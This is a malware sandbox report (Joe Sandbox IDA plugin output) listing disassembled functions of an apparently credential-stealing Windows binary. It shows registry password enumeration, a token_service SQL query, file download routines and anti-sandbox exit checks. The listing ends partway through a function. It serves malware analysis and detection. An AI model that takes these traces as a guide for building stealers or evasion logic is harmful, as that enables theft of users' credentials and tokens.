`v@, xrefs: 00406FAF, 004070C8, 00406FFE, 00407034, 0040707C, 00407045, 00406FB2
: , xrefs: 0040701E

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: : $`v@$h0A
API String ID: 3191641157-3559972273
Opcode ID: 22c65c759e4008ac886b6aeda8a47d70719bcccf3909e077351c77a1654b374d
Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
Opcode Fuzzy Hash: 22c65c759e4008ac886b6aeda8a47d70719bcccf3909e077351c77a1654b374d
Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00415836

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: ebc458d2954fa87928cbffb1aa81fa40cba8a6fc2b0c4bc732e2d226e351cda2
Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
Opcode Fuzzy Hash: ebc458d2954fa87928cbffb1aa81fa40cba8a6fc2b0c4bc732e2d226e351cda2
Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
InternetCloseHandle.WININET(c.A), ref: 00404D75
InternetCloseHandle.WININET(?), ref: 00404D82

Strings

c.A, xrefs: 00404CC1, 00404DA0
c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: c.A$c.A
API String ID: 3066467675-270182787
Opcode ID: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
Opcode Fuzzy Hash: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406CE4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B

task.LIBCPMTD ref: 00406F25

Strings

Password, xrefs: 00406DD1

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
HeapAlloc.KERNEL32(00000000), ref: 004142A7
wsprintfA.USER32 ref: 004142DD

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

:, xrefs: 004141F9
C, xrefs: 004141E9
\, xrefs: 004141FD

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
LocalAlloc.KERNEL32(00000040,?), ref: 00409411
ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
LocalFree.KERNEL32('@), ref: 00409470
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Strings

'@, xrefs: 004093C3, 00409486
'@, xrefs: 00409426, 00409449, 00409429, 0040946F

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: '@$'@
API String ID: 1815715184-345573653
Opcode ID: 48f4b7413470cb3276c60afe27c6050599c7e1b25b920e3e6a5c65917fe61f9c
Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
Opcode Fuzzy Hash: 48f4b7413470cb3276c60afe27c6050599c7e1b25b920e3e6a5c65917fe61f9c
Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,042867D8,00000000,?,0041D774,00000000,?,00000000,00000000,?,042867C0), ref: 0041496D
HeapAlloc.KERNEL32(00000000), ref: 00414974
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
__aulldiv.LIBCMT ref: 004149AF
__aulldiv.LIBCMT ref: 004149BD
wsprintfA.USER32 ref: 004149E9

Strings

@, xrefs: 0041498A
%d MB, xrefs: 004149E0

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
StrCmpCA.SHLWAPI(?,04280B98), ref: 00405DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
InternetCloseHandle.WININET(00410E73), ref: 00405EF3
InternetCloseHandle.WININET(00000000), ref: 00405F00

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
String ID:
API String ID: 729276229-0
Opcode ID: d280471e5beb2f5dce994cb9d002c263a03ba1c9fc69a466f5796a99ebd4536c
Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
Opcode Fuzzy Hash: d280471e5beb2f5dce994cb9d002c263a03ba1c9fc69a466f5796a99ebd4536c
Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00413D9E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
memset.MSVCRT ref: 00413E2A
??_V@YAXPAX@Z.MSVCRT ref: 00413F7E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 136f340d3def94dd6f6bc6e7af2fbddae3deb45c6c7debbe56f20a408c524ea1
Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
Opcode Fuzzy Hash: 136f340d3def94dd6f6bc6e7af2fbddae3deb45c6c7debbe56f20a408c524ea1
Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B44D

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
lstrlen.KERNEL32(00000000), ref: 0040B553
lstrlen.KERNEL32(00000000), ref: 0040B567

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0040B3BB
AccountTokens, xrefs: 0040B28A
AccountId, xrefs: 0040B472
AccountTokens, xrefs: 0040B319

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: 98abb7acb563c795400b8fdc05e2345934e16dcaff006ece4da3f70605bc90d9
Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
Opcode Fuzzy Hash: 98abb7acb563c795400b8fdc05e2345934e16dcaff006ece4da3f70605bc90d9
Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004136B0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04262958), ref: 00415F11
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04262970), ref: 00415F2A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04262988), ref: 00415F42
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042629A0), ref: 00415F5A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042628E0), ref: 00415F73
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,0427DC28), ref: 00415F8B
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04264318), ref: 00415FA3
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04264518), ref: 00415FBC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04280438), ref: 00415FD4
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042805A0), ref: 00415FEC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042803F0), ref: 00416005
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04280570), ref: 0041601D
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04264478), ref: 00416035
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04280588), ref: 0041604E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E

Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254

Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434

GetUserDefaultLangID.KERNEL32 ref: 004136E6

Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,042808A8,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0427DC48,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,0427DC48,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1125299040-0
Opcode ID: 19e3f2ad90109acb9ecb49a28c3fe414203e82b8baa863b8814d0b1a2f2bc6c1
Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
Opcode Fuzzy Hash: 19e3f2ad90109acb9ecb49a28c3fe414203e82b8baa863b8814d0b1a2f2bc6c1
Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

RegQueryValueExA.KERNEL32(00000000,04286C88,00000000,000F003F,?,00000400), ref: 00414C89
lstrlen.KERNEL32(?), ref: 00414C9E
RegQueryValueExA.KERNEL32(00000000,04286D48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
RegCloseKey.KERNEL32(00000000), ref: 00414DA5
RegCloseKey.ADVAPI32(00000000), ref: 00414DB7

Strings

%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 847608d34753723f8b6f2463fc12b18ad18eee0918edd14efbcc07672997e5c5
Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
Opcode Fuzzy Hash: 847608d34753723f8b6f2463fc12b18ad18eee0918edd14efbcc07672997e5c5
Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411DA5
RegOpenKeyExA.KERNEL32(80000001,042876F8,00000000,00020119,?), ref: 00411DC4
RegQueryValueExA.ADVAPI32(?,04288860,00000000,00000000,00000000,000000FF), ref: 00411DE8
RegCloseKey.ADVAPI32(?), ref: 00411DF2
lstrcat.KERNEL32(?,00000000), ref: 00411E17
lstrcat.KERNEL32(?,042888A8), ref: 00411E2B

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

